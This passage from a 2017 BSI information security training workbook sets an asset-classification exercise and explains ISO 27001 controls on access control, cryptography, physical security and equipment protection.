It has made a start on the process of identifying assets and, in its first attempt, has come up with the
following categories of assets:
• Software
• Physical
• Information
• People
• Intangible
• Services and systems
So far, ABC Organization Ltd has identified 22 information assets but has not allocated these into the
appropriate categories.
(…continued over the page)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
40
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Task 1:
Place the 22 assets listed in the table below into the correct categories by entering the category in
the space provided.
Task 2:
Indicate in the ‘value’ column which characteristic of information security is the most important by
placing a ‘C’, ‘I’ or ‘A’ into the column for confidentiality, integrity or availability. If you think that 2 or
3 characteristics are equally important, feel free to enter two or three letters in the column.
If you think that any assets listed are not relevant to information security, then place and X in the
column.
Task 3:
From the organization chart used in Activity 3, identify in the owner column a suitable owner for the
asset. If you believe that there is a more suitable information asset owner that is not specified in the
organization chart feel free to complete the owner column accordingly.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
41
Laptops
Category
Technology
Value
C, I
Owner
IT Director
Technology staff
Electrical supply
Communications room
Mobile phones
Website source code
Copyright © 2017 BSI. All rights reserved.
Distribution centres
Head office building
Customer feedback
Payroll information
Reputation
Change management process
Vending machine
Car parking
Security guards
Staff screening records
HR staff
Brand
Web servers
Desktop pcs
Training material
42
Internal audit reports
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
ISM02101ENGX v2.0 Nov 2017
Asset
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
9.1 Business requirements of access control
Objective: To limit access to information and information processing facilities.
9.1.1 Access control policy
An access control policy should be established, documented and reviewed based on business and
information security requirements.
As part of the process of determining what information assets an organization needs to protect, it is
important to also understand which roles (and therefore users) are required to have access to the
assets in order to perform their duties. Access to information and the supporting information systems
should be restricted based on the requirements of the role and reflecting the associated information
security risks. This can be achieved in a number of ways and will vary across organizations and can
involve both logical and physical controls. However, ultimately, it is the information that drives the
level of protection required and there should be a valid business justification for access which has
been approved by an appropriate authority. Furthermore, users and service providers should be
provided with a clear statement of the business requirements to be met by access controls.
It is important to document who requires access to different information assets and under what
circumstances and what controls need to be in place in order to control such access. This
requirement is satisfied by the Access Control Policy and it is this vehicle which communicates the
business’ requirements for access to users, administrators, managers and other interested parties.
Some organizations may have a number of different systems that require specific access policies to
be defined. This can make the Access Control Policy sometimes large, complex and unwieldy. The
use of a role matrix may be useful as it enables the reader to quickly ascertain which roles require
access to different information and supporting systems.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
43
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Two of the frequent principles directing the access control policy are:
• Need-to-know: You are only granted access to the information you need to perform your tasks
(different tasks/roles mean different need-to-know and hence different access profile)
• Need-to-use: You are only granted access to the information processing facilities (IT equipment,
applications, procedures, rooms) you need to perform your task/job/role
The controls required to manage access appropriately should also be documented within an access
control policy.
An access control policy should ideally take account of the following considerations:
• Security requirements of information
• Policies for information dissemination and authorization
• Consistency between access rights and information classification policies
• Relevant legislation and any contractual obligations (see 18.1)
• Management of access rights in a distributed and networked environment
• Segregation of access control roles
• Requirements for formal authorization of access requests (see 9.2.1 and 9.2.2)
• Periodic review of access rights (see 9.2.5)
• Removal of access rights (see 9.2.6)
• Archiving of records of all significant events
• Roles with privileged access (see 9.2.3)
Care should be taken when specifying access control rules. It is often recommended to adopt an
‘everything is generally forbidden unless expressly permitted’ approach rather than the weaker rule
‘everything is generally permitted unless expressly forbidden’
Access control rules should be supported by formal procedures (see 9.2, 9.3, 9.4) and defined
responsibilities (see 6.1.1, 9.3).
9.1.2 Access to networks and network services
Users should only be provided with access to the network and network services that they have been
specifically authorized to use.
The access control policy (9.1.1) is often used to document access to other supporting infrastructure
such as networks and networking equipment. Sometimes a separate policy may be developed. In the
same way as access to information and systems requires a business justification, so does the need to
access specific networks and network services and equipment. For example, the business justification
to access services across a wifi network may be different to the wired network, and access to
services and systems on the finance network may be different to the device management network.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
44
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Whether combined with the access control policy or developed independently, access to networks
and network services, the policy should cover:
• Types of networks and network services which can be accessed
• Authorization procedures for determining who is allowed access
• Management controls and procedures
• Means used to access networks e.g. VPN or wireless network
• User authentication requirements
• Monitoring network services
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
45
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
9.2 User access management
Objective: To ensure authorized user access and to prevent unauthorized access to systems and
services.
9.2.1 User registration and de-registration
A formal user registration and de-registration process should be implemented to enable assignment
of access rights.
A key component of access control is the need for a reliable and formal registration and deregistration process for users on various systems and networks. The process needs to be appropriate
and consistent, in line with the business requirements defined in the Access Control Policy. It is
important for the process to be documented, particularly where there may be a number of people
and/or departments (e.g. HR, Facilities, IT) involved. The process should include a requirement for all
usernames to be unique so that users can be linked and held responsible for their actions. It is
recommended that special consideration is given and appropriate authority sought for usernames
that need to be shared for business or operation reasons. The process should also ensure that access
to systems is revoked immediately when a user changes roles or leaves the organization. The
resulting IDs should not be re-used. There should also be periodic reviews when redundant user IDs
are removed or disabled.
9.2.2 User access provisioning
A formal user access provisioning process should be implemented to assign or revoke access rights
for all user types to all systems and services.
When provisioning a new user, and particularly in large, complex organizations or where there are a
number of users or departments involved in the user access provisioning, the process should be
documented in order to provide reliable, repeatable and consistent results. The provisioning process
for assigning or revoking access rights granted to user IDs should include:
(…continued on next page)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
46
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• Obtaining authorization from the owner of the information system or service (see 8.1.2); separate
approval for access rights from management may also be appropriate
• Verifying that the level of access granted is appropriate to the access policies (see 9.1) and is
consistent with other requirements such as segregation of duties (see 6.1.2)
• Ensuring that access rights are not activated (e.g. by service providers) before authorization
procedures are completed
• Maintaining a central record of access rights granted to a user ID to access information systems
and services
• Adapting access rights of users who have changed roles or jobs and immediately removing or
blocking access rights of users who have left the organization
• Reviewing (periodically) access rights with owners of the information systems or services (see
9.2.5)
9.2.3 Management of privileged access rights
The allocation and use of privileged access rights should be restricted and controlled.
Particular care should be taken when creating user accounts that have special privileges. Such
privileges such as superuser accounts and manager accounts within the various systems in use
should be documented within the Access Control Policy and the roles should also be identified that
require such levels of access. Where possible, such elevated privileges should only be granted on a
‘need-to-use’ basis and on an ‘event-by-event’ basis in line with the access control policy (see 9.1.1),
i.e. based on the minimum requirement for their functional roles.
Such privileges should be revoked when not being used. It is also suggested that time limits are
associated with the use of privileged accounts so that they can only be used for certain periods of
time or at certain times of the day on only on certain days of the week to reduce the possibility of
misuse. Privileged access rights should also be assigned to a user ID different from those used for
regular business activities. Regular business activities should not be performed from a privileged user
ID.
9.2.4 Management of secret authentication information of users
The allocation of secret authentication information should be controlled through a formal
management process
One of the biggest weaknesses associated with the use of authentication information (e.g.
passwords, smart codes) is carelessness or misunderstanding on the part of users on how this
information should be protected. The organization should ensure that it educates its users on the use
of authentication information to prevent accounts being misused (e.g. do not write down passwords,
do not share passwords, use different passwords for different systems etc.). Users should choose
their own passwords, but be educated on developing strong passwords. Users should be required to
sign a statement to keep personal secret authentication information confidential and to keep group
(i.e. shared) secret authentication information solely within the members of the group. When users
are required to maintain their own secret authentication information they should be provided initially
with secure temporary secret authentication information, which they are forced to change on first
use. The temporary
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
47
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
secret authentication information should be unique to an individual and should not be guessable. The
organization also needs to develop procedures to verify the identity of a user prior to providing new,
replacement or temporary secret authentication information. There also should be a requirement on
users to acknowledge receipt of secret authentication information.
Authentication information often comes pre-configured in some systems to enable initial access ‘out of
the box’. These should always be changed to a complex password that cannot be guessed to reduce
the likelihood of unauthorized access to the organization’s systems and information.
9.2.5 Review of user access rights
Asset owners should review users’ access rights at regular intervals.
System and information asset owners should ensure that they review the users who have access to
their systems to ensure that the access remains appropriate. This review should be conducted regularly
or after any change or termination of employment. The review of the level of access (i.e. privileges)
within those systems should be reviewed at more frequent intervals.
Any user accounts that have not been used for a certain length of time should be disabled or removed
along with those accounts that belong to users who should no longer have access to the system.
It should be noted that this control can compensate for possible weaknesses in the execution of
controls 9.2.1, 9.2.2 and 9.2.6.
9.2.6 Removal or adjustment of access rights
The access rights of all employees and external party users to information and information processing
facilities should be removed upon termination of their employment, contract or agreement, or adjusted
upon change.
When a user leaves an organization, the access rights they had to information or systems involved in
information processing should be revoked in a timely manner. The value of the assets that the user had
access to, the current responsibilities of the user and the circumstances under which they left the
organization should all be taken into consideration in determining how quickly the revocation takes
place. In some circumstances (e.g. disciplinary processes which result in termination of employment)
the revocation should take place immediately. In cases of management-initiated termination,
disgruntled employees or external party users can deliberately corrupt information or sabotage
information processing facilities. In cases of persons resigning or being dismissed, they may be
tempted to collect information for future use.
Where users move to a different part of the organization, access should be revoked to the information
and systems to which they no longer require access to perform the duties of their role. If the use was
part of a group of users that had access to a shared ID, the user should be removed from the group
and all other members of the group should be informed to ensure that information to which the
departing user no longer requires access is not shared. As well as revoking logical access, physical
access also needs to be considered. Removal or adjustment can be done by removal, revocation or
replacement of keys, identification cards, information processing facilities or subscriptions.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
48
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
9.3 User responsibilities
Objective: To make users accountable for safeguarding their authentication information.
9.3.1 Use of secret authentication information
Users should be required to follow the organization’s practices in the use of secret authentication
information.
Users should be advised on their responsibilities when using secret authentication information (e.g.
passwords) and how that information should be protected. They should be advised never to divulge
their secret authentication information, even to authority figures. Users need to be advised on how to
choose a strong yet easy to remember password that, i.e. one they do not need to write down. For
example, the password should not be based on the username and should not incorporate easy to
research information such as dates of birth or names of family members. The password should also
not be a dictionary word as these things are all easy to guess and make the password weaker.
Passwords should also be free of consecutive identical, all-numeric or all-alphabetic characters. Users
should be advised that the passwords they use in their personal lives should be different to the ones
they use in the workplace. This is often because the business requirements for security are more
stringent than that required for personal accounts. Users should be educated with regard to issues
such as social networking where attackers may use social techniques to extract sensitive information
from users such as passwords. If users believe there is even the slightest possibility of password
compromise, they should change it immediately.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
49
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
9.4 System and application access control
Objective: To prevent unauthorized access to systems and applications.
9.4.1 Information access restriction
Access to information and application system functions should be restricted in accordance with the
access control policy.
When considering the business requirements for access to information and systems and documenting
this within the Access Control Policy, organizations should ensure that they consider all possibilities
for access to information. For example, the ability to run reports within a system may provide outputs
which contain information to which the user may not normally have access. The way in which this
type (and other types) of functionality within a system can be restricted should therefore be analysed
and implemented. For example, the provision of a menu system to provide access to certain types of
functionality should be considered with users that have lower privileges within the system being
restricted from seeing and accessing the menu options that would otherwise be available.
Other types of restrictions to be considered include restricting users to ‘read only’ access, restricting
users from sharing information with others or limiting the information contained in outputs. The use
of clearance levels for users which can be tied to access to information of a particular classification
should be considered as a way of identifying those users that have a business need or a business
authorisation to access and interact with information and information systems.
9.4.2 Secure log-on procedures
Where required by the access control policy, access to systems and applications should be controlled
by a secure log-on procedure.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
50
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The value of the information within any system should be determined before suitable access control
methods and log-on procedures are decided upon. For example, an organization may decide it is
acceptable to access information system which only contains non-sensitive information with a simple
username and passwords. Alternatively, where systems contain highly sensitive information, greater
levels of authentication may be required, such as the use of multi-factor authentication including the
use of smart cards, biometrics and tokens. As such, an organization should ensure that it designs the
log-on system appropriate to the classification of the information held within the system in order to
reduce the likelihood of an attacker gaining unauthorized access.
Adequate protection against such attacks should be considered and built into the log-in process
including guarding against brute force attacks by limiting the number of failed login attempts allowed.
Security information should be recorded including the number and time and date of login attempts,
whether successful or not, so that unauthorized access might be detected. Systems should not
provide an attacker with information that would help them further their attack. A good log-on
procedure should only validate the log-on information on completion of all input data. If an error
condition arises, the system should not indicate which part of the data is correct or incorrect.
Log-on procedures can also be strengthened by not transmitting passwords in clear text over a
network, by terminating inactive sessions after a defined period of inactivity, especially in high risk
locations and by restricting connection times to provide additional security for high-risk applications
and reduce the window of opportunity for unauthorized access
Authentication information should be protected when it is stored within the system or when it is being
communicated across a network, for example through encryption techniques.
9.4.3 Password management system
Password management systems should be interactive and should ensure quality passwords.
A management system should be implemented to ensure that whenever passwords are chosen for a
user, the password is unique, is of sufficient length, quality and complexity. The management system
should force passwords to be changed upon first use of the password if the password was not set by
the user and force passwords to be changed regularly thereafter to reduce the window of opportunity
for a password to be discovered. Passwords should not be displayed when entered into a system and
a record of previously used passwords should be kept to ensure that the user is not able to repeat
the same password. A password management system can also improve security by storing password
files separately from application system data, as well as storing and transmitting passwords in
protected form
9.4.4 Use of privileged utility programs
The use of utility programs that might be capable of overriding system and application controls
should be restricted and tightly controlled.
Modern computer systems often come pre-loaded with powerful utility programs and other utility
programs may be installed by the IT department in order to perform automated tasks.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
51
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
These utility programs often require heightened privileges to perform their tasks and can often
override system and application security controls. As a consequence, access to the use of these utility
programs should be restricted to those who require it for their roles to ensure that they are not
misused and also to enable monitoring to take place.
9.4.5 Access control to program source code
Access to program source code should be restricted
Wherever the organization is involved in application and system development, care should be taken
to ensure that unauthorized access to source code and other materials such as plans, drawings and
specifications is prevented to ensure that unauthorized changes cannot be made as well as to ensure
the confidentiality of intellectual property. For example, unauthorized access to program source code
could lead to the introduction of unwanted program functionality or malicious software (malware)
such as trap doors and back doors. Program source libraries should be kept under change control
and restrictions placed on the ability to copy them. Access to program source libraries should be
monitored and reviewed. Program listings should be held in a secure environment.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
52
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
10.1 Cryptographic controls
Objective: To ensure proper and effective use of cryptography to protect the confidentiality,
authenticity and/or integrity of information.
10.1.1 Policy on the use of cryptographic controls
A policy on the use of cryptographic controls for protection of information should be developed and
implemented.
The organization, when considering the value of the information assets under its control should
ensure that it identifies the need for restricting access to such information to protect its
confidentiality, integrity, non-repudiation and authentication. Access can be restricted through the
use of access controls (see Section 9), but to ensure that confidentiality can be maintained even
when access restrictions fail, the use of cryptographic technology should be considered.
When developing a cryptographic policy the following should be considered:
• Management approach towards the use of cryptographic controls across the organization
• Following a risk assessment, the type, strength and quality of the encryption algorithm required
• The protection of information transported by mobile or removable media devices
• The approach to key management, including methods to deal with the protection of cryptographic
keys
• Roles and responsibilities in implementing the policy and for key management
• Standards to be adopted for implementing across the organization
• The impact of using encrypted information on controls that rely upon content inspection (e.g.
malware detection)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
53
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Making a decision as to whether a cryptographic solution is appropriate should be seen as part of the
wider process of risk assessment and selection of controls. This assessment can then be used to
determine whether a cryptographic control is appropriate, what type of control should be applied and
for what purpose and business processes. Where cryptographic technology is implemented, the
organization should ensure that it is reliable and cannot itself be compromised. Care should be taken
though where constant access to information is required and some encryption technology may slow
processes down.
A policy on the use of cryptographic controls is necessary to maximize the benefits and minimize the
risks of using cryptographic techniques and to avoid inappropriate or incorrect use.
Cryptographic techniques can be used to meet other information security objectives. For example
nonrepudiation can be achieved through the use of cryptographic or digital signatures and the integrity
of information can be assured through the use of one way hashing functions.
10.1.2 Key management
A policy on the use, protection and lifetime of cryptographic keys should be developed and
implemented through their whole lifecycle.
Wherever cryptographic techniques are used to protect information, suitable management and
protection of the associated keys is paramount if the system is not to be compromised. There are a
number of elements of key management to consider throughout the lifecycle of the keys and include:
• Key generation
• Key distribution
• Key storage
• Key updates and changes
• Key compromise
• Key revocation
• Key recovery
• Key archiving and backups
• Key destruction
• Key audit logging (logging of the activities associated with the use of keys
In order to reduce the likelihood of improper use, activation and deactivation dates for keys should be
defined so that the keys can only be used for the period of time defined in the associated key
management policy.
The use of public key infrastructure should also be considered part of key management as it is used to
authenticate the public key in public key cryptography systems through the issuing of certificates.
All of these items should have policies implemented and documented to state what the requirements
are for each stage within the business. Where necessary, these policies should be underpinned with
documented processes and procedures to ensure key management is implemented in a reliable,
repeatable and effective manner.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
54
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
11.1 Secure areas
Objective: To prevent unauthorized physical access, damage and interference to the organization’s
information and information processing facilities.
Physical security is just as important as logical security to ensure the confidentiality, integrity and
availability of information assets and the places and facilities within which they are stored, handled,
processed and transmitted.
Physical protection can be achieved through a variety of different measures and ‘layers’. For example,
the use of internal access controlled doors would give protection in the event that an external entrance
door was compromised.
The application of physical controls should be adapted based on appropriate technology, cost and risk.
11.1.1 Physical security perimeter
Security perimeters should be defined and used to protect areas that contain either sensitive or critical
information and information processing facilities.
Security perimeters should be used to protect areas that contain either sensitive or critical information
and information processing facilities. The siting and strength of each perimeter controls should depend
on the security requirements and risks associated with the assets within the perimeter to be protected.
The perimeters of a building or site containing information processing facilities should be physically
sound (i.e. there should be no gaps in the perimeter or areas where a break-in could easily occur).
The exterior roof, walls and flooring of the site should be of solid construction and all external doors
should be suitably protected against unauthorized access with control mechanisms, (e.g. bars, alarms,
locks). Additional barriers and perimeters to control physical access may be needed between areas
with different security requirements inside the security perimeter, particularly where premises are
multi-tenanted with different organizations.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
55
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Doors and windows should be locked when unattended and external protection should be considered
for windows, particularly at ground level. Fire doors on a security perimeter should be alarmed,
monitored and tested in accordance with suitable regional, national and International Standards; they
should operate in accordance with the local fire regulations in a failsafe manner.
Organizations should consider installation of suitable intruder detection systems to cover all external
access and egress points and conform to appropriate national, regional or international standards.
Where installed, intruder detection systems should be regularly tested. Unoccupied areas should,
where practical, be alarmed at all times. Intruder detection cover should also be provided as
appropriate to other secure areas, e.g. computer room or communications rooms. Where information
processing facilities are managed by the organization they should be physically separated from those
managed by external parties.
11.1.2 Physical entry controls
Secure areas should be protected by appropriate entry controls to ensure that only authorized
personnel are allowed access.
Secure areas can be self contained lockable rooms or several rooms surrounded by a continuous
internal physical security barrier.
Secure areas should be protected by appropriate entry controls to ensure that only authorized
personnel are allowed access. Physical entry controls should include provisions for the following:
• Physical or electronic log audit trail maintained for all physical access to premises
• Visible identification worn by all employees, contractors and external parties, creating the ability to
identify, report and challenge unauthorized personnel
• Access control to areas where confidential information is processed or stored should be restricted
to authorized individuals by implementing appropriate access controls, e.g. by implementing a
two-factor authentication mechanism such as an access card and secret PIN
• Visitor management, including: Appropriate verification of visitor identity, recording date and time
of entry and departure of visitors, visitor supervision, visitor access should only be granted for
specific, authorized purposes and visitors should be issued with instructions on the security
requirements of the area and on emergency procedures
• Restriction and monitoring of access of external party support service personnel should be granted
restricted access to secure areas or confidential information processing facilities only when
required; this access should be authorized and monitored
• Access rights to secure areas should be regularly reviewed and updated, and revoked when
necessary (see 9.2.5 and 9.2.6)
11.1.3 Securing offices, rooms and facilities
Physical security for offices, rooms and facilities should be designed and applied.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
56
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In securing offices, rooms and facilities, organizations should:
• Protect the storage of keys and other access tokens, ensuring they are only accessible to authorized
personnel and appropriately identified and accounted for
• Depending on the risk profile of the facilities, consider minimizing signage indicating their occupation
or purpose. Internal layout is important to prevent confidential information or activities being visible
and audible from the outside. Control provisions may include appropriate window coverings or
dressings. Electromagnetic shielding may also be considered as appropriate
• Consider appropriately restricting access to information held within personnel directories (e.g. global
address lists and internal telephone books) identifying locations of confidential information
processing facilities
11.1.4 Protecting against external and environmental threats
Physical protection against natural disasters, malicious attack or accidents should be designed and
applied.
Physical protection against external and environmental threats including natural disasters, malicious
attack or accidents should be designed and applied. Specialist advice may need to be sought in relation
to protection from threats such as fire, earthquake, explosion and civil unrest.
11.1.5 Working in secure areas
Procedures for working in secure areas should be designed and applied
Personnel should only be aware of the existence of, or activities within, a secure area on a need-toknow basis. Unsupervised working in secure areas should be avoided both for safety reasons and to
prevent opportunities for malicious activities. Vacant secure areas should be physically locked and
periodically reviewed. Organizations should consider a policy and, as appropriate, prohibition measures
or authorization procedures for the use of photographic, video, audio or other recording equipment,
such as cameras within mobile devices.
11.1.6 Delivery and loading areas
Access points such as delivery and loading areas and other points where unauthorized persons could
enter the premises should be controlled and, if possible, isolated from information processing facilities
to avoid unauthorized access.
Access points such as delivery and loading areas and other points where unauthorized persons could
enter the premises should be controlled, if possible, with access restricted to identified and authorized
personnel and/or isolated from information processing facilities to avoid unauthorized access. This
should include implementing measures such as the installation of physical barriers (e.g. cages or dual
shutter doors) so that supplies can be loaded and unloaded without delivery personnel gaining access
to other parts of the building.
Incoming material should be inspected and examined for evidence of tampering en route, for
explosives, chemicals or other hazardous materials, before it is moved from a delivery and loading area,
with procedures to report and deal with suspect packages. Goods in and out should be registered
(upon receipt into and removal from the loading area) in accordance with asset management
procedures (see Clause 8) and incoming and outgoing goods should be physically segregated, where
possible, to enable easy identification and tracking of items.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
57
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
11.2 Equipment
Objective: To prevent loss, damage, theft or compromise of assets and interruption to the
organization’s operations.
11.2.1 Equipment siting and protection
Equipment should be sited and protected to reduce the risks from environmental threats and hazards,
and opportunities for unauthorized access.
In order to prevent the loss, damage, theft of assets, reduce the risks posed by environmental
threats (e.g. theft, fire, explosives, smoke, water, lightening, dust, vibration, chemical effects,
communications interference and electromagnetic radiation) and minimize interruption to the
organization’s operations, measures need to be implemented to carefully locate and protect assets.
Equipment should be located or sited so that access can be limited on a ‘least necessary’ basis.
Equipment storing or processing sensitive data should be positioned carefully to reduce the risk of
information being viewed by unauthorized persons.
Alongside physical access controls described within 11.1 to prevent unauthorized access, any specific
items requiring special protection should be appropriately safeguarded. Such protection may be
achieved through a wide ranging variety of measures, examples include installation of lockable server
cabinets and zonal alarms.
Environmental protection controls (in addition to environmental controls outlined within 11.1.4) may
include the installation of specific fire suppression systems, water pumps, structural strengthening,
building lightening protection, equipment dust protection, temperature and humidity monitoring and
provision of guidelines for use of information processing facilities such as eating, drinking and
smoking.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
58
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
11.2.2 Supporting utilities
Equipment should be protected from power failures and other disruptions caused by failures in
supporting utilities.
Equipment should be protected from power failures and other disruptions caused by failures in
supporting utilities (e.g. telecommunications, water supply, gas, sewage, ventilation and air
conditioning). Again, a variety of measures can be taken to avoid failure and disruption of supply of
supporting utilities, ranging from ensuring that equipment meets the manufacturer’s specifications
and local legal requirements, managing its capacity, monitoring its functionality and conducting
regular inspections to ensure it is in proper working order, to making provisions for alternative
supplies, such as through provision of emergency lighting, multiple communications and/or network
connectivity feeds, access to multiple energy or communications providers, installation of
uninterrupted power supply (UPS) units and/or on site power generators.
11.2.3 Cabling security
Power and telecommunications cabling carrying data or supporting information services should be
protected from interception, interference or damage.
Organizations should ensure that power and telecommunications cabling carrying data or supporting
information services should be protected from interception, interference or damage.
Power and telecommunications lines into information processing facilities should be underground
